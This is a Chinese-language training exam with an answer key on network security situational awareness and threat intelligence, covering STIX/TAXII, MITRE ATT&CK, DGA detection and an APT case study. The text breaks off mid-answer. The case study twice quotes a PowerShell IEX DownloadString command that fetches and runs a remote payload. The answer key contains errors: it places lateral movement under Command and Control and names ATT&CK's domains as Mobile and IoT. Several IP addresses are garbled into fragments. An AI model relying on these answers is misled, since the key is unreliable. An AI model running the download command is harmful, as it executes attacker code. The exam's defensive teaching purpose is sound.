2025年網(wǎng)絡(luò)安全態(tài)勢(shì)感知與威脅情報(bào)培訓(xùn)試卷及答案一、單項(xiàng)選擇題（每題2分，共20分）1.以下哪項(xiàng)不屬于網(wǎng)絡(luò)安全態(tài)勢(shì)感知的核心組件？A.數(shù)據(jù)采集層B.威脅情報(bào)庫C.可視化展示平臺(tái)D.物理設(shè)備巡檢系統(tǒng)2.威脅情報(bào)按粒度可分為戰(zhàn)略級(jí)、戰(zhàn)術(shù)級(jí)和操作級(jí)，其中戰(zhàn)術(shù)級(jí)情報(bào)的典型輸出形式是？A.《2025年APT攻擊趨勢(shì)白皮書》B.具體攻擊IP地址與惡意文件哈希值C.攻擊者使用的C2服務(wù)器通信協(xié)議特征D.行業(yè)客戶面臨的主要威脅類型分析報(bào)告3.某企業(yè)部署態(tài)勢(shì)感知系統(tǒng)時(shí)，發(fā)現(xiàn)內(nèi)網(wǎng)流量中存在大量ICMP小包（<64字節(jié)）定向發(fā)送至非業(yè)務(wù)主機(jī)，最可能的攻擊場(chǎng)景是？A.DNS隧道數(shù)據(jù)外發(fā)B.網(wǎng)絡(luò)蠕蟲橫向掃描C.釣魚郵件附件下載D.勒索軟件加密進(jìn)程4.STIX2.1標(biāo)準(zhǔn)中，用于描述“攻擊者使用的惡意軟件”的對(duì)象類型是？A.Indicator（指標(biāo)）B.Malware（惡意軟件）C.AttackPattern（攻擊模式）D.Campaign（攻擊活動(dòng)）5.以下哪項(xiàng)技術(shù)最適合用于檢測(cè)未知威脅的“行為異?！?？A.基于特征庫的入侵檢測(cè)（IDS）B.基于機(jī)器學(xué)習(xí)的流量行為分析C.基于規(guī)則的防火墻策略過濾D.基于漏洞庫的補(bǔ)丁管理系統(tǒng)6.威脅情報(bào)生命周期中，“將分析結(jié)果轉(zhuǎn)化為可操作指令（如防火墻規(guī)則、殺軟特征）”屬于哪個(gè)階段？A.收集（Collection）B.分析（Analysis）C.傳播（Dissemination）D.應(yīng)用（Application）7.MITREATT&CK框架中，“橫向移動(dòng)（LateralMovement）”屬于哪個(gè)戰(zhàn)術(shù)階段？A.初始訪問（InitialAccess）B.執(zhí)行（Execution）C.持久化（Persistence）D.命令與控制（CommandandControl）8.某金融機(jī)構(gòu)態(tài)勢(shì)感知平臺(tái)發(fā)現(xiàn)，內(nèi)網(wǎng)某服務(wù)器連續(xù)3天在凌晨2點(diǎn)向境外IP（00為示例，實(shí)際應(yīng)為公網(wǎng)IP）發(fā)送HTTPPOST請(qǐng)求，請(qǐng)求體包含加密字符串。最合理的下一步操作是？A.立即封禁該境外IPB.提取請(qǐng)求流量進(jìn)行深度解析（如解密、協(xié)議分析）C.重啟服務(wù)器觀察是否恢復(fù)正常D.向員工發(fā)送通知提醒防范釣魚郵件9.以下哪項(xiàng)是威脅情報(bào)“可信度（Confidence）”評(píng)估的關(guān)鍵依據(jù)？A.情報(bào)來源的權(quán)威性（如CISA、FireEye）B.情報(bào)中包含的IOC數(shù)量（如IP、哈希）C.情報(bào)發(fā)布的時(shí)間（是否為最新）D.情報(bào)與企業(yè)業(yè)務(wù)場(chǎng)景的相關(guān)性10.云環(huán)境下的態(tài)勢(shì)感知與傳統(tǒng)數(shù)據(jù)中心的最大差異在于？A.需重點(diǎn)監(jiān)控虛擬網(wǎng)絡(luò)流量（vSwitch、VXLAN）B.無需關(guān)注物理服務(wù)器日志C.威脅情報(bào)僅需關(guān)注云廠商提供的默認(rèn)規(guī)則D.數(shù)據(jù)采集只需接入云平臺(tái)API接口二、填空題（每空1分，共20分）1.網(wǎng)絡(luò)安全態(tài)勢(shì)感知的核心三要素是感知、理解和________。2.威脅情報(bào)平臺(tái)（TIP）的核心功能包括情報(bào)聚合、________、________和可視化展示。3.ATT&CK框架分為企業(yè)網(wǎng)絡(luò)（Enterprise）、________和________三個(gè)子域。4.常見的日志標(biāo)準(zhǔn)化格式包括CEF（通用事件格式）和________（Syslog的擴(kuò)展格式）。5.流量鏡像技術(shù)中，SPAN（端口鏡像）與RSPAN（遠(yuǎn)程端口鏡像）的主要區(qū)別是________。6.惡意軟件分析中，“沙箱（Sandbox）”的核心作用是________。7.威脅情報(bào)的“可行動(dòng)性（Actionable）”要求情報(bào)能直接轉(zhuǎn)化為________或________（如防火墻規(guī)則、EDR策略）。8.態(tài)勢(shì)感知系統(tǒng)中，“告警降噪”的常用方法包括________（如合并重復(fù)告警）和________（如基于業(yè)務(wù)場(chǎng)景的優(yōu)先級(jí)排序）。9.APT（高級(jí)持續(xù)性威脅）的典型特征包括________、________和長期潛伏。10.2025年新興威脅中，“AI生成釣魚內(nèi)容”的主要技術(shù)手段是________（如GPT4及以上模型）和________（如深度偽造語音/圖像）。三、簡答題（每題8分，共40分）1.簡述網(wǎng)絡(luò)安全態(tài)勢(shì)感知系統(tǒng)中“數(shù)據(jù)采集層”的主要技術(shù)手段及各自適用場(chǎng)景。2.對(duì)比戰(zhàn)略級(jí)威脅情報(bào)與操作級(jí)威脅情報(bào)的區(qū)別（需從目標(biāo)對(duì)象、內(nèi)容深度、應(yīng)用方式三方面說明）。3.說明STIX/TAXII協(xié)議在威脅情報(bào)共享中的作用（需解釋STIX和TAXII的具體功能）。4.某企業(yè)態(tài)勢(shì)感知平臺(tái)檢測(cè)到內(nèi)網(wǎng)主機(jī)存在“異常DNS查詢”（如查詢大量隨機(jī)子域名），請(qǐng)分析可能的攻擊場(chǎng)景及對(duì)應(yīng)的排查步驟。5.結(jié)合2025年技術(shù)趨勢(shì)，闡述AI技術(shù)在威脅情報(bào)分析中的具體應(yīng)用（至少列舉3個(gè)場(chǎng)景）。四、案例分析題（20分）背景：某制造企業(yè)（以下簡稱A公司）部署了網(wǎng)絡(luò)安全態(tài)勢(shì)感知系統(tǒng)（以下簡稱S平臺(tái)），2025年3月15日，S平臺(tái)觸發(fā)以下告警：告警1：3月14日22:0023:00，研發(fā)部主機(jī)PC001向境外IP（5）發(fā)送500+次DNS查詢，查詢內(nèi)容為隨機(jī)8位字母組合（如“”“”）。告警2：3月15日02:10，PC001通過443端口與5建立TCP連接，傳輸數(shù)據(jù)量約1.2MB。告警3：3月15日02:30，PC001的進(jìn)程“svchost.exe”（PID:1234）調(diào)用powershell執(zhí)行命令：`powershellc"IEX(NewObjectNet.WebClient).DownloadString('5/payload')"`。關(guān)聯(lián)日志：PC001于3月14日18:30接收一封主題為“2025年產(chǎn)品需求確認(rèn)”的郵件，附件為“需求文檔.docx”，哈希值為`a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6`。要求：根據(jù)以上信息，完成以下分析：（1）判斷攻擊場(chǎng)景的類型（如APT、勒索軟件、數(shù)據(jù)外發(fā)等），并說明依據(jù)。（5分）（2）提取關(guān)鍵IOC（指標(biāo)），包括IP、文件哈希、域名特征等。（5分）（3）結(jié)合威脅情報(bào)分析，推測(cè)攻擊者可能使用的技術(shù)（需對(duì)應(yīng)MITREATT&CK戰(zhàn)術(shù)/技術(shù)）。（5分）（4）提出后續(xù)響應(yīng)措施（至少4項(xiàng)）。（5分）答案一、單項(xiàng)選擇題1.D（物理設(shè)備巡檢屬于運(yùn)維范疇，非態(tài)勢(shì)感知核心）2.C（戰(zhàn)術(shù)級(jí)情報(bào)聚焦攻擊技術(shù)細(xì)節(jié)，如協(xié)議特征）3.B（ICMP小包定向掃描是蠕蟲橫向移動(dòng)的典型行為）4.B（STIX中Malware對(duì)象描述惡意軟件）5.B（機(jī)器學(xué)習(xí)通過行為建模檢測(cè)未知異常）6.D（應(yīng)用階段將情報(bào)轉(zhuǎn)化為防護(hù)指令）7.D（橫向移動(dòng)屬于命令與控制前的戰(zhàn)術(shù)階段）8.B（需先解析流量內(nèi)容，避免誤封）9.A（來源權(quán)威性是可信度核心依據(jù)）10.A（云環(huán)境需重點(diǎn)監(jiān)控虛擬網(wǎng)絡(luò)流量）二、填空題1.預(yù)測(cè)2.清洗過濾、關(guān)聯(lián)分析3.移動(dòng)設(shè)備（Mobile）、物聯(lián)網(wǎng)（IoT）4.LEEF（日志事件擴(kuò)展格式）5.RSPAN支持跨交換機(jī)鏡像，SPAN僅支持本地6.在隔離環(huán)境中觀察惡意軟件行為7.防護(hù)策略、檢測(cè)規(guī)則8.規(guī)則合并、場(chǎng)景化優(yōu)先級(jí)9.目標(biāo)明確性、資源專業(yè)性10.大語言模型（LLM）、多模態(tài)生成三、簡答題1.數(shù)據(jù)采集層技術(shù)手段及場(chǎng)景：流量鏡像（SPAN/RSPAN）：適用于交換機(jī)級(jí)別的網(wǎng)絡(luò)流量采集（如核心交換機(jī)、邊界路由器）。日志拉?。⊿yslog/API）：適用于設(shè)備（如防火墻、IDS）、服務(wù)器（如WindowsEventLog）的結(jié)構(gòu)化日志采集。端點(diǎn)探針（Agent）：適用于主機(jī)級(jí)行為采集（如進(jìn)程調(diào)用、文件操作），需安裝輕量級(jí)代理。威脅情報(bào)接口（如MISP/TAXII）：適用于外部威脅數(shù)據(jù)（如IOC、攻擊模式）的實(shí)時(shí)同步。2.戰(zhàn)略級(jí)與操作級(jí)威脅情報(bào)對(duì)比：目標(biāo)對(duì)象：戰(zhàn)略級(jí)面向企業(yè)管理層（如CEO、安全總監(jiān)），操作級(jí)面向一線安全運(yùn)維人員（如SOC分析師）。內(nèi)容深度：戰(zhàn)略級(jí)側(cè)重趨勢(shì)分析（如“2025年制造業(yè)APT攻擊增長30%”），操作級(jí)側(cè)重具體指標(biāo)（如“C2服務(wù)器IP:5，惡意文件哈希:a1b2c3...”）。應(yīng)用方式：戰(zhàn)略級(jí)用于安全預(yù)算分配、風(fēng)險(xiǎn)策略調(diào)整；操作級(jí)用于直接阻斷攻擊（如封禁IP、更新殺軟特征）。3.STIX/TAXII的作用：STIX（結(jié)構(gòu)化威脅信息表達(dá)）：定義威脅情報(bào)的標(biāo)準(zhǔn)化數(shù)據(jù)模型（如攻擊模式、惡意軟件、指標(biāo)），解決情報(bào)格式混亂問題。TAXII（可信自動(dòng)交換協(xié)議）：定義情報(bào)共享的通信協(xié)議（如推送/拉取、訂閱），支持不同組織間的自動(dòng)化情報(bào)交換。二者結(jié)合實(shí)現(xiàn)“機(jī)器可讀、自動(dòng)共享”，提升情報(bào)利用效率。4.異常DNS查詢的攻擊場(chǎng)景與排查步驟：可能場(chǎng)景：C2服務(wù)器域名生成算法（DGA）通信（攻擊者通過隨機(jī)子域名繞過DNS封鎖）；惡意軟件嘗試連接C2服務(wù)器。排查步驟：①提取DNS查詢?nèi)罩?，統(tǒng)計(jì)域名生成規(guī)律（如是否符合DGA算法特征）；②反向查詢境外IP的注冊(cè)信息（如WHOIS、歷史解析記錄）；③檢查主機(jī)是否存在異常進(jìn)程（如非系統(tǒng)自帶的DNS客戶端）；④結(jié)合沙箱分析主機(jī)近期下載的文件，確認(rèn)是否包含DGA模塊。5.AI在威脅情報(bào)分析中的應(yīng)用：自動(dòng)化情報(bào)清洗：通過NLP技術(shù)從非結(jié)構(gòu)化文本（如威脅報(bào)告、論壇帖子）中提取關(guān)鍵IOC（如IP、哈希），降低人工標(biāo)注成本。未知威脅預(yù)測(cè)：基于歷史攻擊數(shù)據(jù)訓(xùn)練模型，預(yù)測(cè)攻擊者可能使用的新技術(shù)（如針對(duì)量子加密的攻擊方法）。行為異常檢測(cè)：通過圖神經(jīng)網(wǎng)絡(luò)（GNN）分析主機(jī)/用戶行為圖，識(shí)別隱藏的橫向移動(dòng)路徑（如“主機(jī)A→B→C”的非業(yè)務(wù)邏輯訪問）。四、案例分析題（1）攻擊場(chǎng)景類型：APT攻擊（高級(jí)持續(xù)性威脅）。依據(jù)：攻擊過程分階段（釣魚郵件投遞→DNS探測(cè)→C2通信→惡意代碼執(zhí)行），且攻擊者使用了DGA域名（隨機(jī)子域名）和混淆命令（powershellIEX下載），符合APT長期潛伏、隱蔽通信的特征。（2）關(guān)鍵IOC：IP地址：5（C2服務(wù)器）；文件哈希：a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6（惡意文檔附件）；域名特征：隨機(jī)8位字母組合的DNS查詢（DGA生成）；進(jìn)程命令：`powershellc"IEX(NewObjectNet.WebClient).DownloadString('5/payload')"`（惡意代碼加載命令）。（3）MITREATT&CK技術(shù)對(duì)應(yīng)：初始訪問（InitialAccess）：釣魚郵件（T1566.001，魚叉式網(wǎng)絡(luò)釣魚）；執(zhí)行（Execution）：PowerShell執(zhí)行（T1059.001，PowerShell）；命令與控制（CommandandControl）：DGA域名（T1568.002，域名生成算法）、HTTPS通信（T1071.001，應(yīng)用層協(xié)議）。（4）后續(xù)響應(yīng)措施：①隔離PC001（斷開網(wǎng)絡(luò)連接），防止惡意代碼擴(kuò)